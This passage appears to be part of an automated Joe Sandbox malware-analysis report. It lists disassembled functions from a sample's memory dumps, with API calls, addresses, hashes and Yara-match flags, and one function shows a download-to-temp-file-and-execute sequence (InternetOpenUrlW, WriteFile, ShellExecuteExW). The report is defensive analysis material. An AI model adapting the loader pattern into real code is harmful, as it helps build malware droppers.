                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42B1AFB1900205EFDB20DF68C885BEEBBF4BF49304F14466DF499A7252D779A941CB20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 0043A62C
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
                                                                                                                                                                                                                                • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A621
                                                                                                                                                                                                                                • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A643
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A658
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A663
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A685
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A698
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A6A6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A6B1
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A6E9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A6F0
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A70D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A725
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                              • Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 007BA893
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9BFF
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9C11
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9C23
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9C35
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9C47
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9C59
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9C6B
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9C7D
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9C8F
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9CA1
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9CB3
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9CC5
                                                                                                                                                                                                                                • Part of subcall function 007B9BE2: _free.LIBCMT ref: 007B9CD7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA888
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: HeapFree.KERNEL32(00000000,00000000,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?), ref: 007B36D7
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: GetLastError.KERNEL32(?,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?,?), ref: 007B36E9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA8AA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA8BF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA8CA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA8EC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA8FF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA90D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA918
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA950
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA957
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA974
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007BA98C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                              • Instruction ID: 9030a58847eeda0c43782ff0e26672e1be32640773d911388e6c9a941332a4db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85314C31600305FFEB21AB38E849BD677E8BF00314F51442AE459D7661DB39BD919B26
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                              • Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00782C74
                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00782C8A
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000105,?), ref: 00782CA6
                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00782CBC
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00782CF5
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00782D31
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00782D4E
                                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00782DC5
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 00782DDA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                              • API String ID: 838076374-4251816714
                                                                                                                                                                                                                              • Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                                                                                                                                              • Instruction ID: 71788e94ac1cae3467e684484bf8d69c676994779cff1f4003cda21b2b510d2e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0741727594021CAFEB209F60DC85FEAB7BCFF05706F0080E5A544E2151DE749E868FA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0079F218,00000004,00797D77,00000004,00798059), ref: 0079EEE9
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0079F218,00000004,00797D77,00000004,00798059,?,00798789,?,00000008,00797FFD,00000000,?,?,00000000,?), ref: 0079EEF5
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(advapi32.dll,?,0079F218,00000004,00797D77,00000004,00798059,?,00798789,?,00000008,00797FFD,00000000,?,?,00000000), ref: 0079EF05
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00447430), ref: 0079EF1B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF31
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF48
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF5F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF76
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF8D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID: advapi32.dll
                                                                                                                                                                                                                              • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                              • Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                                                                                                                                              • Instruction ID: a6ecb3ff91d74bcaa6bd296729de17ffa64e7dfa60efff53b11266ff69150501
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B2171B2904750BFDB107FB4AC09B59BFA8EF05B16F108A26F541D3612CB7CC8418BA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0079F218,00000004,00797D77,00000004,00798059), ref: 0079EEE9
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0079F218,00000004,00797D77,00000004,00798059,?,00798789,?,00000008,00797FFD,00000000,?,?,00000000,?), ref: 0079EEF5
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(advapi32.dll,?,0079F218,00000004,00797D77,00000004,00798059,?,00798789,?,00000008,00797FFD,00000000,?,?,00000000), ref: 0079EF05
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00447430), ref: 0079EF1B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF31
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF48
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF5F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF76
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079EF8D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID: advapi32.dll
                                                                                                                                                                                                                              • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                              • Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                                                                                                                                              • Instruction ID: 3bf74539368d4c85576db4c581e43a9d1da03ed3a1e4c8d01659b71f7cb438e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 662183B2904750BFDB107F649C09B5ABFACEF05B16F008A26F541D3612CB7CD8408BA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,007966FB), ref: 007924A6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 007924B4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 007924C2
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,007966FB), ref: 007924F0
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 007924F7
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007966FB), ref: 00792512
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007966FB), ref: 0079251E
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00792534
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00792542
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                              • String ID: kernel32.dll
                                                                                                                                                                                                                              • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                              • Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                                                                                                                                              • Instruction ID: 0cb18c47ad9525b06d6e3973937bd4c920866210ff8de613defa23c092009418
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE118276901310BFEB117B757C8EA6B3AACAE41B127110526F801D2153EE7CD90186AD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856
                                                                                                                                                                                                                                • Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35
                                                                                                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00424888
                                                                                                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0042494C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                              • String ID: pContext$switchState
                                                                                                                                                                                                                              • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                              • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                              • Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
                                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 00419769
                                                                                                                                                                                                                              • SafeRWList.LIBCONCRT ref: 00419788
                                                                                                                                                                                                                                • Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
                                                                                                                                                                                                                                • Part of subcall function 00417757: List.LIBCMT ref: 00417772
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004197A9
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004197CD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID: eventObject
                                                                                                                                                                                                                              • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                              • Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                                                                                                                                              • Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 007A0C26
                                                                                                                                                                                                                              • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 007A0C8D
                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 007A0CAA
                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 007A0D10
                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 007A0D25
                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 007A0D37
                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 007A0D65
                                                                                                                                                                                                                              • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 007A0D70
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007A0D9C
                                                                                                                                                                                                                              • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 007A0DAC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3720063390-0
                                                                                                                                                                                                                              • Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                                                                                                                                              • Instruction ID: b084dec52567db18ec9acd73e8df346211dcb3815c19473c3af7a2d6a073ab48
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE41C131A00208DBDF14FFA4D5597ED77A1AF83310F0446A9E9466B283DB7D9E05CBA2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431DEA
                                                                                                                                                                                                                                • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431DF6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431E01
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431E0C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431E17
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431E22
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431E2D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431E38
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431E43
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00431E51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                              • Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B2051
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: HeapFree.KERNEL32(00000000,00000000,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?), ref: 007B36D7
                                                                                                                                                                                                                                • Part of subcall function 007B36C1: GetLastError.KERNEL32(?,?,007BA34F,?,00000000,?,00000000,?,007BA5F3,?,00000007,?,?,007BA9E7,?,?), ref: 007B36E9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B205D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B2068
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B2073
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B207E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B2089
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B2094
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B209F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B20AA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B20B8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                              • Instruction ID: 572561b99f976ff077c1f0e5762fec8be78796e9578ac2d63e4ddaffbe8e6bd6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF114276511108FFCB01EF94C946ED93FA5EF04354B9185A5FA088B272DA35EFA0DB80
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
